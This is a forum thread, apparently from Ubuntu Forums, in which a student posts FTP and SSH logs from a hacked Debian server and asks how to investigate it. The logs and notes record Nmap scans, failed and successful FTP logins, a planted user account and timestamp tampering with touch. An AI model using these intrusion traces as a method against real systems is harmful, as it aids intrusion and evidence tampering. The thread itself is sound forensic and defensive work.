Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:28:33 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:36:46 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'DBSNMP'
Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER DBSNMP: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:36:55 ServerGroep1 proftpd[3061] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:36:56 ServerGroep1 proftpd[3061] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:37:21 ServerGroep1 proftpd[3067] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:22 ServerGroep1 proftpd[3067] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:37:23 ServerGroep1 proftpd[3071] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:42 ServerGroep1 proftpd[3071] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:37:42 ServerGroep1 proftpd[3077] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:42 ServerGroep1 proftpd[3077] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:37:46 ServerGroep1 proftpd[3079] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:46 ServerGroep1 proftpd[3079] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:37:48 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:49 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:37:49 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:38:03 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:38:04 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:38:04 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:38:12 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:38:15 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:38:15 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:38:19 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:38:23 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:38:37 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): USER leo: Login successful.
Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): Preparing to chroot to directory '/var/www/user/leo'
Apr 12 12:41:55 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): using sendfile capability for transmitting data
Apr 12 12:42:11 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): using sendfile capability for transmitting data
Apr 12 12:43:56 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): FTP session closed.
Several login attempts. Most of them failed, then suddenly they are successful.
Notable entries:
Evil.host 10.0.0.14
Cc4u.lan 10.13.37.10
Also:
Attempt to attack?
/var/log/proftpd/xverlog
12 april 12.38.xx - 12.50.xx
Cc4u.lan -> files have been transfered to folder leo
Bash script has been planted? Or?
/var/log/syslog
Several portscans, blocked IP’s
/var/log/wtmp
http://ubuntuforums.org/archive/index.php/t-886287.html
I will place the contents of this file tomorrow, but it contains several entries with several tty's (7, 9) and pts/0.
Auth.log:
Code:
Apr 12 11:18:00 ServerGroep1 login[3087]: ROOT LOGIN on 'tty1'
Apr 12 11:20:10 ServerGroep1 sshd[3104]: Did not receive identification string from 10.0.0.14
Apr 12 11:20:17 ServerGroep1 sshd[3106]: Protocol major versions differ for 10.0.0.14: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
Apr 12 11:20:18 ServerGroep1 sshd[3109]: Protocol major versions differ for 10.0.0.14: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
Apr 12 11:25:49 ServerGroep1 sshd[2183]: Server listening on :: port 22.
Apr 12 11:25:49 ServerGroep1 sshd[2183]: Server listening on 0.0.0.0 port 22.
Apr 12 11:25:55 ServerGroep1 sshd[2183]: Received signal 15; terminating.
Apr 12 11:25:55 ServerGroep1 sshd[2982]: Server listening on :: port 22.
Apr 12 11:25:55 ServerGroep1 sshd[2982]: Server listening on 0.0.0.0 port 22.
Apr 12 11:28:21 ServerGroep1 sshd[2992]: Did not receive identification string from 10.13.37.10
Apr 12 11:28:28 ServerGroep1 sshd[2996]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
Apr 12 11:28:28 ServerGroep1 sshd[2998]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
Apr 12 11:36:59 ServerGroep1 login[2925]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Apr 12 11:36:59 ServerGroep1 login[3062]: ROOT LOGIN on 'tty1'
Apr 12 11:37:49 ServerGroep1 sshd[3081]: Did not receive identification string from 10.13.37.10
Apr 12 11:38:56 ServerGroep1 sshd[3092]: Did not receive identification string from 10.13.37.10
Apr 12 11:39:01 ServerGroep1 CRON[3100]: pam_unix(cron:session): session opened for user root by (uid=0)
Apr 12 11:39:01 ServerGroep1 CRON[3100]: pam_unix(cron:session): session closed for user root
Apr 12 11:44:13 ServerGroep1 sshd[3139]: Did not receive identification string from 10.13.37.10
Apr 12 11:44:21 ServerGroep1 sshd[3143]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
Apr 12 11:44:21 ServerGroep1 sshd[3145]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
Apr 12 11:57:24 ServerGroep1 sshd[3205]: Accepted password for root from 10.0.0.10 port 54049 ssh2
==============
What we do think to know:
- A user “cees” has been added to both the passwd and shadowfile
- The account Leo has been used to gain FTP access
- evil.host and cc4u.lan are malicious hosts.
- The IP’s 10.0.0.14 and 10.13.37.10 are suspicious at least
- There have been several attempts to find vulnerabilities in the website
- A hacker framework has been used to find vulnerabilities
- A bash script in Leo’s folder contains very suspicious information. For example: the touch command was used, to alter timestamps.
- The suspicious activities start april 12 2010
Questions remaining..
- The exact number of hackers, is unknown.
- The identity of the hackers is unknown.
- Can we still trust our timestamps since we know the touch command has been used?
- When was the first server access? And how did they gain access in the first place?
Could you please advice on how to investigate this issue more thoroughly?
Help is much appreciated.
May 24th, 2011, 06:15 PM
Debian server has been hacked; where to look for evidence?
) :
Re: Debian server has been hacked; where to look for evidence?
i presumed they are internal IP's on both mine and yours. But as you were asking about the 10 range on yours, i wondered if you were concerned that something fishy was happening there, due to you posting about them ? Which made me wonder about my 10 range.
. We haven't hacked either. We learn about hacking techniques, perform some basic things (like path traversal, cross site scripting, sql injections, etc) but focus on investigating. We aren't taught to become investigators either 
Re: Debian server has been hacked; where to look for evidence?
